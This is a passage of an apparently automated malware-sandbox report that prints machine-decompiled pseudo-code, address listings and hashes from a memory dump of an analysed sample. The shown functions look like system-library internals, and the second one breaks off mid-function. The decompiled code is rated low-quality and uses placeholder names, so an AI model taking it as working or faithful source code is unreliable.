									 *((intOrPtr*)(_t318 - 0x34)) = _t206;
									__eflags =  *(_t318 - 0x28) - _t308;
									_t307 = 0x7ffe0010;
								} while ( *(_t318 - 0x28) != _t308);
								__eflags =  *(_t318 - 0x5c) - _t206;
							} while ( *(_t318 - 0x5c) != _t206);
							_t207 =  *0x1d8c67f0; // 0x0
							_t309 =  *0x1d8c67f4; // 0x0
							 *(_t318 - 0x28) = _t309;
							__eflags =  *(_t318 - 0x30) - _t207;
							_t307 = 0x7ffe0010;
						} while ( *(_t318 - 0x30) != _t207);
						__eflags =  *(_t318 - 0x3c) -  *(_t318 - 0x28);
					} while ( *(_t318 - 0x3c) !=  *(_t318 - 0x28));
					_t316 =  *((intOrPtr*)(_t318 - 0x68));
					_t269 =  *(_t318 - 0x64);
					asm("sbb edx, [ebp-0x34]");
					asm("sbb edx, eax");
					 *(_t318 - 0x28) = _t279 -  *(_t318 - 0x38) -  *(_t318 - 0x30) + 0x7a120;
					asm("adc edx, edi");
					asm("lock inc dword [esi+0x28]");
					_t209 =  *((intOrPtr*)(_t318 - 0x20));
					_t40 = _t209 + 0x18; // 0x193d4b8
					_t284 =  *(_t316 + 0x20) &  *_t40;
					 *(_t318 - 0x38) = _t284;
					__eflags =  *(_t316 + 0x30);
					if( *(_t316 + 0x30) != 0) {
						L37:
						_t314 =  *_t316;
						 *((intOrPtr*)(_t318 - 0x68)) = _t314;
						E1D7FF24A(_t318 - 0x74, _t269,  *((intOrPtr*)(_t318 - 0x54)), _t318 - 0x58, 0, _t314, _t318 - 0x74);
						__eflags =  *(_t318 - 0x58);
						if( *(_t318 - 0x58) != 0) {
							 *0x1d8c91e0( *((intOrPtr*)(_t318 - 0x74)));
							 *(_t318 - 0x58)();
						}
						continue;
					}
					__eflags = _t284;
					if(_t284 == 0) {
						goto L37;
					}
					 *(_t318 - 0x60) = _t284;
					_t44 = _t318 - 0x60;
					 *_t44 =  *(_t318 - 0x60) & 0x00000001;
					__eflags =  *_t44;
					if( *_t44 == 0) {
						L40:
						__eflags = _t284 & 0xfffffffe;
						if((_t284 & 0xfffffffe) != 0) {
							__eflags =  *(_t316 + 0x60);
							if( *(_t316 + 0x60) == 0) {
								L14:
								__eflags =  *(_t316 + 0x3c);
								if( *(_t316 + 0x3c) != 0) {
									__eflags = _t301 -  *((intOrPtr*)(_t316 + 0x48));
									if(__eflags > 0) {
										goto L15;
									}
									if(__eflags < 0) {
										L59:
										_t146 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x1940b04
										__eflags =  *((intOrPtr*)(_t316 + 0x58)) -  *_t146;
										if( *((intOrPtr*)(_t316 + 0x58)) >=  *_t146) {
											goto L37;
										}
										goto L15;
									}
									__eflags =  *(_t318 - 0x28) -  *((intOrPtr*)(_t316 + 0x44));
									if( *(_t318 - 0x28) >=  *((intOrPtr*)(_t316 + 0x44))) {
										goto L15;
									}
									goto L59;
								}
								L15:
								__eflags =  *(_t318 + 8);
								if( *(_t318 + 8) != 0) {
									__eflags =  *(_t316 + 0x54);
									if( *(_t316 + 0x54) != 0) {
										goto L16;
									}
									goto L37;
								}
								L16:
								 *(_t318 - 0x24) = 0;
								 *(_t318 - 0x30) = 0;
								 *((intOrPtr*)(_t318 - 0x2c)) =  *((intOrPtr*)(_t316 + 0xc));
								_t215 =  *((intOrPtr*)(_t316 + 8));
								 *((intOrPtr*)(_t318 - 0x44)) =  *((intOrPtr*)(_t215 + 0x10));
								 *((intOrPtr*)(_t318 - 0x40)) =  *((intOrPtr*)(_t215 + 0x14));
								 *(_t318 - 0x5c) =  *(_t215 + 0x24);
								 *((intOrPtr*)(_t318 - 0x34)) =  *((intOrPtr*)(_t316 + 0x10));
								 *((intOrPtr*)(_t318 - 0x6c)) =  *((intOrPtr*)(_t316 + 0x14));
								 *((intOrPtr*)(_t316 + 0x5c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
								_t222 =  *((intOrPtr*)(_t318 - 0x48)) + 0x28;
								 *(_t318 - 0x8c) = _t222;
								_t291 = _t222;
								 *(_t318 - 0x28) = _t291;
								 *(_t318 - 0x88) = _t291;
								E1D7E24D0(_t222);
								_t292 = 0;
								 *(_t318 - 0x50) = 0;
								 *(_t318 - 0x4c) = 0;
								 *(_t318 - 0x3c) = 0;
								__eflags =  *(_t316 + 0x24);
								if(__eflags != 0) {
									asm("lock bts dword [eax], 0x0");
									_t227 = 0;
									_t228 = _t227 & 0xffffff00 | __eflags >= 0x00000000;
									 *(_t318 - 0x4c) = _t228;
									 *(_t318 - 0x3c) = _t228;
									__eflags = _t228;
									if(_t228 != 0) {
										goto L17;
									}
									__eflags =  *(_t318 + 8) - 1;
									if( *(_t318 + 8) == 1) {
										L1D7E2330( *(_t316 + 0x24) + 0x10,  *(_t316 + 0x24) + 0x10);
										_t228 = 1;
										 *(_t318 - 0x4c) = 1;
										 *(_t318 - 0x3c) = 1;
										goto L17;
									}
									_t231 = _t228 + 1;
									L35:
									 *(_t316 + 0x54) = _t231;
									__eflags = _t292;
									if(_t292 == 0) {
										L1D7E2330(_t231,  *(_t318 - 0x28));
									}
									 *((intOrPtr*)(_t316 + 0x5c)) = 0;
									goto L37;
								}
								L17:
								__eflags =  *(_t316 + 0x30);
								if( *(_t316 + 0x30) != 0) {
									L26:
									__eflags =  *(_t318 - 0x4c);
									if( *(_t318 - 0x4c) != 0) {
										_t228 = E1D7E24D0( *(_t316 + 0x24) + 0x10);
									}
									__eflags =  *(_t318 - 0x30);
									if( *(_t318 - 0x30) == 0) {
										L71:
										_t292 =  *(_t318 - 0x50);
										L34:
										_t231 = 0;
										goto L35;
									}
									L1D7E2330(_t228,  *(_t318 - 0x8c));
									_t292 = 1;
									 *(_t318 - 0x50) = 1;
									__eflags =  *(_t318 - 0x24) - 0xc000022d;
									if( *(_t318 - 0x24) == 0xc000022d) {
										L69:
										__eflags =  *(_t316 + 0x1c) & 0x00000004;
										if(( *(_t316 + 0x1c) & 0x00000004) == 0) {
											goto L34;
										}
										_t269 = 1;
										__eflags = 1;
										 *(_t318 - 0x64) = 1;
										_t187 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x1940b04
										E1D85C726( *((intOrPtr*)(_t318 - 0x54)),  *(_t318 - 0x24),  *_t187);
										goto L71;
									}
									__eflags =  *(_t318 - 0x24) - 0xc0000017;
									if( *(_t318 - 0x24) == 0xc0000017) {
										goto L69;
									}
									__eflags =  *(_t316 + 0x18);
									if( *(_t316 + 0x18) != 0) {
										_t133 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x1940b04
										__eflags =  *_t133 -  *(_t316 + 0x18);
										if( *_t133 -  *(_t316 + 0x18) > 0) {
											goto L31;
										}
										L32:
										__eflags =  *(_t316 + 0x1c) & 0x00000004;
										if(( *(_t316 + 0x1c) & 0x00000004) != 0) {
											__eflags =  *(_t316 + 0x4c);
											if( *(_t316 + 0x4c) > 0) {
												 *(_t316 + 0x3c) = 0;
												 *((intOrPtr*)(_t316 + 0x50)) = 0;
												 *((intOrPtr*)(_t316 + 0x44)) = 0;
												 *((intOrPtr*)(_t316 + 0x48)) = 0;
												 *(_t316 + 0x4c) = 0;
												 *((intOrPtr*)(_t316 + 0x58)) = 0;
											}
										}
										goto L34;
									}
									L31:
									_t107 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x1940b04
									 *(_t316 + 0x18) =  *_t107;
									goto L32;
								}
								 *(_t318 - 0x30) = 1;
								 *((intOrPtr*)(_t318 - 0x7c)) = 1;
								 *((intOrPtr*)(_t318 - 0x6c)) = E1D7FF1F0( *((intOrPtr*)(_t318 - 0x6c)));
								 *((intOrPtr*)(_t318 - 4)) = 0;
								__eflags =  *(_t318 - 0x60);
								if( *(_t318 - 0x60) != 0) {
									_t255 =  *((intOrPtr*)(_t318 - 0x20));
									_t82 = _t255 + 0x14; // 0x193d4b8
									_t86 = _t255 + 0x10; // 0x1940b04
									 *0x1d8c91e0( *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)),  *_t86,  *(_t318 - 0x5c),  *((intOrPtr*)(_t318 - 0x34)),  *((intOrPtr*)(_t318 - 0x70)),  *_t82);
									 *(_t318 - 0x24) =  *((intOrPtr*)(_t318 - 0x2c))();
								}
								_t244 =  *(_t318 - 0x38);
								__eflags = _t244 & 0x00000010;
								if((_t244 & 0x00000010) != 0) {
									__eflags =  *(_t316 + 0x30);
									if( *(_t316 + 0x30) != 0) {
										goto L21;
									}
									__eflags =  *(_t318 - 0x24);
									if( *(_t318 - 0x24) >= 0) {
										L64:
										 *0x1d8c91e0( *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)), 0,  *(_t318 - 0x5c),  *((intOrPtr*)(_t318 - 0x34)), 0, 0);
										 *((intOrPtr*)(_t318 - 0x2c))();
										 *(_t318 - 0x24) = 0;
										_t244 =  *(_t318 - 0x38);
										goto L21;
									}
									__eflags =  *(_t316 + 0x1c) & 0x00000004;
									if(( *(_t316 + 0x1c) & 0x00000004) != 0) {
										goto L21;
									}
									goto L64;
								} else {
									L21:
									__eflags = _t244 & 0xffffffee;
									if((_t244 & 0xffffffee) != 0) {
										 *(_t318 - 0x24) = 0;
										 *0x1d8c91e0( *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)),  *((intOrPtr*)(_t318 - 0x34)), _t244);
										 *((intOrPtr*)(_t318 - 0x2c))();
									}
									_t247 = E1D7E3C40();
									__eflags = _t247;
									if(_t247 != 0) {
										_t250 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x234;
									} else {
										_t250 = 0x7ffe038e;
									}
									__eflags =  *_t250;
									if( *_t250 != 0) {
										_t175 =  *((intOrPtr*)(_t318 - 0x20)) + 0x10; // 0x1940b04
										_t250 = E1D85C490( *_t175,  *((intOrPtr*)(_t318 - 0x54)),  *((intOrPtr*)(_t318 - 0x48)),  *((intOrPtr*)(_t318 - 0x2c)),  *(_t318 - 0x38),  *(_t318 - 0x24),  *((intOrPtr*)(_t318 - 0x44)),  *((intOrPtr*)(_t318 - 0x40)));
									}
									 *((intOrPtr*)(_t318 - 4)) = 0xfffffffe;
									E1D7FF1DB(_t250);
									_t228 = E1D7FF1F0( *((intOrPtr*)(_t318 - 0x6c)));
									goto L26;
								}
							}
						}
						__eflags = _t284 & 0x00000010;
						if((_t284 & 0x00000010) == 0) {
							goto L37;
						}
						goto L14;
					}
					__eflags =  *(_t316 + 0x18);
					if( *(_t316 + 0x18) != 0) {
						_t120 = _t209 + 0x10; // 0x1940b04
						__eflags =  *_t120 -  *(_t316 + 0x18);
						if( *_t120 -  *(_t316 + 0x18) > 0) {
							goto L14;
						}
						goto L40;
					}
					goto L14;
				}
			}
































                                                                            0x1d7fee48
                                                                            0x1d7fee4a
                                                                            0x1d7fee4f
                                                                            0x1d7fee54
                                                                            0x1d7fee56
                                                                            0x1d7fee5b
                                                                            0x1d7fee60
                                                                            0x1d7fee63
                                                                            0x1d7fee66
                                                                            0x1d7fee68
                                                                            0x1d7fee70
                                                                            0x1d7fee73
                                                                            0x1d7fee76
                                                                            0x1d7fee79
                                                                            0x1d7fee80
                                                                            0x1d7fee85
                                                                            0x1d7fee88
                                                                            0x00000000
                                                                            0x1d7fee8b
                                                                            0x1d7fee93
                                                                            0x1d7fee98
                                                                            0x1d7fee9f
                                                                            0x1d7feeac
                                                                            0x1d7feeb8
                                                                            0x1d7feeb8
                                                                            0x1d7feebe
                                                                            0x1d7feec6
                                                                            0x1d7feec9
                                                                            0x1d7feec9
                                                                            0x1d7feece
                                                                            0x1d7feece
                                                                            0x1d7feece
                                                                            0x1d7feece
                                                                            0x1d7feece
                                                                            0x1d7feece
                                                                            0x1d7feed3
                                                                            0x1d7feed6
                                                                            0x1d7feedb
                                                                            0x1d7feee0
                                                                            0x1d7feee6
                                                                            0x1d7feeee
                                                                            0x1d7feeee
                                                                            0x1d7feef0
                                                                            0x1d7feef4
                                                                            0x1d7feef6
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d7ff1dc
                                                                            0x1d7ff1dc
                                                                            0x1d7feefc
                                                                            0x1d7feefc
                                                                            0x1d7fef01
                                                                            0x1d7fef03
                                                                            0x1d7fef06
                                                                            0x1d7fef09
                                                                            0x1d7fef0c
                                                                            0x1d7fef0f
                                                                            0x1d7fef0f
                                                                            0x1d7fef16
                                                                            0x1d7fef16
                                                                            0x1d7fef1b
                                                                            0x1d7fef20
                                                                            0x1d7fef26
                                                                            0x1d7fef29
                                                                            0x1d7fef2c
                                                                            0x1d7fef2c
                                                                            0x1d7fef36
                                                                            0x1d7fef36
                                                                            0x1d7fef3b
                                                                            0x1d7fef40
                                                                            0x1d7fef46
                                                                            0x1d7fef4c
                                                                            0x1d7fef54
                                                                            0x1d7fef57
                                                                            0x1d7fef59
                                                                            0x1d7fef60
                                                                            0x1d7fef63
                                                                            0x1d7fef63
                                                                            0x1d7fef66
                                                                            0x1d7fef69
                                                                            0x1d7fef6c
                                                                            0x1d7ff113
                                                                            0x1d7ff113
                                                                            0x1d7ff115
                                                                            0x1d7ff122
                                                                            0x1d7ff127
                                                                            0x1d7ff12b
                                                                            0x1d83fe64
                                                                            0x1d83fe6a
                                                                            0x1d83fe6a
                                                                            0x00000000
                                                                            0x1d7ff12b
                                                                            0x1d7fef72
                                                                            0x1d7fef74
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d7fef7a
                                                                            0x1d7fef7d
                                                                            0x1d7fef7d
                                                                            0x1d7fef7d
                                                                            0x1d7fef81
                                                                            0x1d7ff144
                                                                            0x1d7ff144
                                                                            0x1d7ff14a
                                                                            0x1d83fd20
                                                                            0x1d83fd23
                                                                            0x1d7fef90
                                                                            0x1d7fef90
                                                                            0x1d7fef93
                                                                            0x1d83fd2e
                                                                            0x1d83fd31
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d83fd37
                                                                            0x1d83fd45
                                                                            0x1d83fd4b
                                                                            0x1d83fd4b
                                                                            0x1d83fd4e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d83fd54
                                                                            0x1d83fd3c
                                                                            0x1d83fd3f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d83fd3f
                                                                            0x1d7fef99
                                                                            0x1d7fef99
                                                                            0x1d7fef9c
                                                                            0x1d7ff1a6
                                                                            0x1d7ff1a9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d7ff1af
                                                                            0x1d7fefa2
                                                                            0x1d7fefa2
                                                                            0x1d7fefa5
                                                                            0x1d7fefab
                                                                            0x1d7fefae
                                                                            0x1d7fefb4
                                                                            0x1d7fefba
                                                                            0x1d7fefc0
                                                                            0x1d7fefc6
                                                                            0x1d7fefcc
                                                                            0x1d7fefd8
                                                                            0x1d7fefde
                                                                            0x1d7fefe1
                                                                            0x1d7fefe7
                                                                            0x1d7fefe9
                                                                            0x1d7fefec
                                                                            0x1d7feff3
                                                                            0x1d7feff8
                                                                            0x1d7feffa
                                                                            0x1d7fefff
                                                                            0x1d7ff002
                                                                            0x1d7ff008
                                                                            0x1d7ff00a
                                                                            0x1d7ff15d
                                                                            0x1d7ff164
                                                                            0x1d7ff165
                                                                            0x1d7ff168
                                                                            0x1d7ff16b
                                                                            0x1d7ff16e
                                                                            0x1d7ff170
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d7ff176
                                                                            0x1d7ff17a
                                                                            0x1d7ff1c8
                                                                            0x1d7ff1cf
                                                                            0x1d7ff1d0
                                                                            0x1d7ff1d3
                                                                            0x00000000
                                                                            0x1d7ff1d3
                                                                            0x1d7ff17c
                                                                            0x1d7ff105
                                                                            0x1d7ff105
                                                                            0x1d7ff108
                                                                            0x1d7ff10a
                                                                            0x1d7ff1b7
                                                                            0x1d7ff1b7
                                                                            0x1d7ff110
                                                                            0x00000000
                                                                            0x1d7ff110
                                                                            0x1d7ff010
                                                                            0x1d7ff010
                                                                            0x1d7ff013
                                                                            0x1d7ff0a2
                                                                            0x1d7ff0a2
                                                                            0x1d7ff0a6
                                                                            0x1d7ff186
                                                                            0x1d7ff186
                                                                            0x1d7ff0ac
                                                                            0x1d7ff0b0
                                                                            0x1d83fe56
                                                                            0x1d83fe56
                                                                            0x1d7ff103
                                                                            0x1d7ff103
                                                                            0x00000000
                                                                            0x1d7ff103
                                                                            0x1d7ff0bc
                                                                            0x1d7ff0c3
                                                                            0x1d7ff0c4
                                                                            0x1d7ff0c7
                                                                            0x1d7ff0ce
                                                                            0x1d83fe35
                                                                            0x1d83fe35
                                                                            0x1d83fe39
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d83fe41
                                                                            0x1d83fe41
                                                                            0x1d83fe42
                                                                            0x1d83fe48
                                                                            0x1d83fe51
                                                                            0x00000000
                                                                            0x1d83fe51
                                                                            0x1d7ff0d4
                                                                            0x1d7ff0db
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d7ff0e1
                                                                            0x1d7ff0e5
                                                                            0x1d7ff193
                                                                            0x1d7ff199
                                                                            0x1d7ff19b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d7ff0f4
                                                                            0x1d7ff0f4
                                                                            0x1d7ff0f8
                                                                            0x1d7ff0fa
                                                                            0x1d7ff0fd
                                                                            0x1d83fe1e
                                                                            0x1d83fe21
                                                                            0x1d83fe24
                                                                            0x1d83fe27
                                                                            0x1d83fe2a
                                                                            0x1d83fe2d
                                                                            0x1d83fe2d
                                                                            0x1d7ff0fd
                                                                            0x00000000
                                                                            0x1d7ff0f8
                                                                            0x1d7ff0eb
                                                                            0x1d7ff0ee
                                                                            0x1d7ff0f1
                                                                            0x00000000
                                                                            0x1d7ff0f1
                                                                            0x1d7ff01c
                                                                            0x1d7ff01f
                                                                            0x1d7ff02a
                                                                            0x1d7ff02d
                                                                            0x1d7ff030
                                                                            0x1d7ff034
                                                                            0x1d7ff036
                                                                            0x1d7ff039
                                                                            0x1d7ff045
                                                                            0x1d7ff051
                                                                            0x1d7ff05a
                                                                            0x1d7ff05a
                                                                            0x1d7ff05d
                                                                            0x1d7ff060
                                                                            0x1d7ff062
                                                                            0x1d83fd59
                                                                            0x1d83fd5c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d83fd62
                                                                            0x1d83fd66
                                                                            0x1d83fd72
                                                                            0x1d83fd84
                                                                            0x1d83fd8a
                                                                            0x1d83fd8d
                                                                            0x1d83fd90
                                                                            0x00000000
                                                                            0x1d83fd90
                                                                            0x1d83fd68
                                                                            0x1d83fd6c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d7ff068
                                                                            0x1d7ff068
                                                                            0x1d7ff068
                                                                            0x1d7ff06d
                                                                            0x1d83fd98
                                                                            0x1d83fda8
                                                                            0x1d83fdae
                                                                            0x1d83fdae
                                                                            0x1d7ff073
                                                                            0x1d7ff078
                                                                            0x1d7ff07a
                                                                            0x1d83fdbf
                                                                            0x1d7ff080
                                                                            0x1d7ff080
                                                                            0x1d7ff080
                                                                            0x1d7ff085
                                                                            0x1d7ff088
                                                                            0x1d83fde1
                                                                            0x1d83fde4
                                                                            0x1d83fde4
                                                                            0x1d7ff08e
                                                                            0x1d7ff095
                                                                            0x1d7ff09d
                                                                            0x00000000
                                                                            0x1d7ff09d
                                                                            0x1d7ff062
                                                                            0x1d83fd29
                                                                            0x1d7ff150
                                                                            0x1d7ff153
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d7ff155
                                                                            0x1d7fef87
                                                                            0x1d7fef8a
                                                                            0x1d7ff136
                                                                            0x1d7ff13c
                                                                            0x1d7ff13e
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1d7ff13e
                                                                            0x00000000
                                                                            0x1d7fef8a

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9a561b7a3d59f2930343d8ca1097c2241cb8d12e130a592e27849e45191085b9
                                                                            • Instruction ID: 6bd0b1ab5b216539c5f37880db88014d65ef223186672577e4548d6b17ed1c33
                                                                            • Opcode Fuzzy Hash: 9a561b7a3d59f2930343d8ca1097c2241cb8d12e130a592e27849e45191085b9
                                                                            • Instruction Fuzzy Hash: F1E1D075D00648DFCB25CFA9D984A9DFBF1BF48720F10492AE569A7360DB70A844CF92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 1D7D58E0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 58%
                                                                            			E1D7D58E0(signed int __ebx, void* __edi, signed int __esi, void* __eflags, signed int _a4) {
				void* _v8;
				signed int _v12;
				char _v20;
				intOrPtr _v28;
				signed int _v32;
				char _v44;
				signed int _v48;
				signed int _v52;
				char _v56;
				signed int _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				signed int _v84;
				char _v96;
				intOrPtr _v144;
				signed int _v160;
				signed int _v164;
				intOrPtr _v168;
				signed char _v176;
				intOrPtr _v180;
				char _v216;
				intOrPtr _v220;
				signed int _v228;
				intOrPtr* _v240;
				char _v244;
				char _v245;
				char _v246;
				char _v247;
				char _v248;
				char _v249;
				char _v250;
				char _v251;
				char _v252;
				char _v253;
				signed int _v260;
				char _v261;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v288;
				signed int _v292;
				char _v300;
				void* _v304;
				signed int _v308;
				char _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				char _v352;
				signed int* _v356;
				signed int _v360;
				signed int _v364;
				signed int _v380;
				intOrPtr _v388;
				signed int _v392;
				intOrPtr _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _t235;
				signed int _t236;
				intOrPtr* _t242;
				intOrPtr _t250;
				char _t253;
				char _t254;
				intOrPtr _t257;
				signed int _t261;
				intOrPtr _t262;
				char _t268;
				void* _t273;
				signed int* _t282;
				intOrPtr _t288;
				signed int* _t292;
				signed int _t293;
				signed int _t297;
				char _t298;
				intOrPtr _t309;
				signed int _t316;
				char _t317;
				signed int _t322;
				signed int _t323;
				char _t332;
				intOrPtr _t339;
				intOrPtr _t340;
				intOrPtr* _t342;
				signed int _t343;
				signed int _t356;
				signed int _t359;
				signed int _t360;
				signed int _t361;
				signed int _t366;
				intOrPtr* _t368;
				char* _t375;
				signed int _t377;
				signed int _t380;
				intOrPtr* _t384;
				signed int _t387;
				intOrPtr _t388;
				void* _t389;
				void* _t390;

				_t390 = __eflags;
				_t379 = __esi;
				_t341 = __ebx;
				_push(0xfffffffe);
				_push(0x1d8abd28);
				_push(0x1d81ad20);
				_push( *[fs:0x0]);
				_t388 = _t387 - 0x184;
				_t235 =  *0x1d8cb370;
				_v12 = _v12 ^ _t235;
				_t236 = _t235 ^ _t387;
				_v32 = _t236;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t236);
				 *[fs:0x0] =  &_v20;
				_v28 = _t388;
				_t377 = _a4;
				_v312 = 0;
				_v260 = _t377;
				_v250 = 0;
				_v251 = 0;
				_v247 = 0;
				_v246 = 0;
				_v252 = 0;
				_v245 = 0;
				_v248 = 0;
				_v253 = 0;
				_v304 = 0;
				_v268 = 0;
				E1D7D8120();
				_v292 =  *[fs:0x30];
				_v8 = 0;
				E1D7D80BE(__ebx,  &_v312, _t377, __esi, _t390);
				_t347 =  &_v304;
				E1D7D8009( &_v304);
				_t242 = _v304;
				if(_t242 != 0) {
					_t347 =  &_v244;
					 *_t242 =  &_v244;
				}
				E1D818F40( &_v244, 0, 0xd4);
				_t389 = _t388 + 0xc;
				_v8 = 1;
				_v8 = 2;
				L1D7D53C0(_t377 + 0xe0);
				_v8 = 3;
				if( *((char*)(_t377 + 0xe5)) != 0) {
					_v276 = 0xc000010a;
					L73:
					_v246 = 1;
					_v247 = 1;
					L5:
					_v8 = 2;
					E1D7D6055(_t377);
					_t394 = _v247;
					if(_v247 != 0) {
						L67:
						_v8 = 1;
						E1D7D6074(_t341, _t347, _t377, _t379);
						_v8 = 0;
						E1D7D6179(_t379);
						_t379 = 0;
						__eflags = 0;
						_v276 = 0;
						_v8 = 0xfffffffe;
						_t250 = E1D80B490(_t347, _t371, 0);
						L68:
						_v300 = 0;
						L12:
						if((_v84 & 0x00000001) != 0) {
							E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v96);
							_v84 = _v84 & 0xfffffffe;
							_t250 = _v276;
						}
						if(_t250 != 0) {
							_t253 = _t250 - 0x80;
							__eflags = _t253;
							if(_t253 == 0) {
								goto L67;
							}
							_t254 = _t253 - 0x40;
							__eflags = _t254;
							if(_t254 == 0) {
								_v8 = 6;
								_t347 = 0;
								E1D7D63CB(0);
								_v8 = 2;
								goto L8;
							}
							__eflags = _t254 != 0x42;
							if(_t254 != 0x42) {
								goto L8;
							}
							_v253 = 1;
							goto L67;
						} else {
							if(_t377 != 0) {
								_t268 =  *((intOrPtr*)(_t377 + 0x110));
								__eflags = _t268;
								if(_t268 != 0) {
									L16:
									if( *((intOrPtr*)(_t377 + 0x100)) != _t268) {
										_t379 = _t377 + 0x2c;
										L1D7E2330(_t268, _t377 + 0x2c);
										E1D8A4407(_t377);
										E1D7E24D0(_t377 + 0x2c);
									}
									_t371 = _v288;
									_t347 =  &_v244;
									_t273 = E1D7D64F0(_t341,  &_v244, _v288, _t377, _v300, _v280, _t377,  &_v245);
									if(_t273 != 0) {
										goto L67;
									} else {
										if(_v245 != _t273) {
											L8:
											_v268 = 0;
											_v64 = 0;
											_v60 = 0;
											_v56 = 0;
											_v52 = 0;
											_t341 = _v48;
											_v280 = 0x10;
											if(_t341 == 0) {
												_t257 =  *0x1d8c6644; // 0x0
												_v392 = _t257 + 0x300000;
												_t261 = E1D7E5D90(_t347,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t257 + 0x00300000 | 0x00000008, 0x1cc);
												__eflags = _t261;
												if(_t261 == 0) {
													L75:
													_v280 = 1;
													_t261 =  &_v64;
													L11:
													_v288 = _t261;
													_v300 = 0;
													_v8 = 5;
													_t262 =  *((intOrPtr*)(_t377 + 0x24));
													_v396 = _t262;
													_push( &_v96);
													_t347 =  &_v300;
													_push( &_v300);
													_push(_v280);
													_push(_v288);
													_push(_t262);
													_t250 = E1D8146E0();
													_v276 = _t250;
													_v8 = 2;
													if(_t250 != 0) {
														goto L68;
													}
													goto L12;
												}
												_t181 = _t261 + 0x1c0; // 0x1c0
												_t366 = _t181;
												 *_t366 = _t261;
												 *((intOrPtr*)(_t366 + 4)) = 1;
												 *((intOrPtr*)(_t366 + 8)) = 0x10;
												_v48 = _t366;
												_v280 = 0x10;
												goto L11;
											}
											if( *((intOrPtr*)(_t341 + 4)) != 1) {
												goto L75;
											}
											_t379 = _v48;
											E1D818F40( *_t379, 0,  *(_t379 + 8) * 8 -  *(_t379 + 8) << 2);
											_t389 = _t389 + 0xc;
											_v280 =  *(_t379 + 8);
											_t261 =  *_t341;
											goto L11;
										}
										_t379 = _v64;
										if(_t379 != 0) {
											_v400 = _t379;
											_v168 =  *((intOrPtr*)(_t379 + 0x20));
											_v164 = _t379;
											_t372 =  &_v244;
											E1D7D6D91(_t377,  &_v244,  *((intOrPtr*)(_t379 + 0x24)),  *(_t379 + 0x28) & 0x000000ff);
											E1D7D6D60( &_v216);
											_v8 = 7;
											_t342 =  *((intOrPtr*)(_t379 + 0x20));
											_push( &_v56);
											_push(_v60);
											_push(_t379);
											_push( &_v216);
											__eflags = _t342 - E1D7D6E00;
											if(_t342 == E1D7D6E00) {
												E1D7D6E00( &_v216);
												L33:
												_v8 = 2;
												L34:
												if((_v176 & 0x00000004) != 0) {
													_v248 = 1;
												}
												_v261 = _v180 == 4;
												_v8 = 9;
												E1D7D61C3( &_v216, _t372);
												_v8 = 2;
												_v228 = 0;
												if(_v248 != 0) {
													_t282 = _t377 + 8;
													_v308 = _t282;
													_t343 =  *_t282;
													_t356 = _t282[1];
													_v328 = _t343;
													_v324 = _t356;
													goto L86;
													do {
														do {
															L86:
															_t380 = _t343;
															_v272 = _t380;
															_t371 = _t356;
															_v380 = _t371;
															_v328 = (_t380 + 0x00000001 ^ _t380) & 0x0000ffff ^ _t380;
															_t379 = _v308;
															asm("lock cmpxchg8b [esi]");
															_t343 = _t380;
															_v328 = _t343;
															_t356 = _t371;
															_v324 = _t356;
															__eflags = _t343 - _v272;
														} while (_t343 != _v272);
														__eflags = _t356 - _v380;
													} while (_t356 != _v380);
													_v352 = 3;
													_push(4);
													_push( &_v352);
													_push(9);
													_push( *((intOrPtr*)(_t377 + 0x24)));
													E1D8143A0();
												} else {
													_t288 =  *((intOrPtr*)(_t377 + 0x110));
													if(_t288 == 0) {
														_t288 =  *0x7ffe03c0;
													}
													if( *((intOrPtr*)(_t377 + 0x100)) != _t288) {
														L1D7E2330(_t288, _t377 + 0x2c);
														E1D8A4407(_t377);
														E1D7E24D0(_t377 + 0x2c);
													}
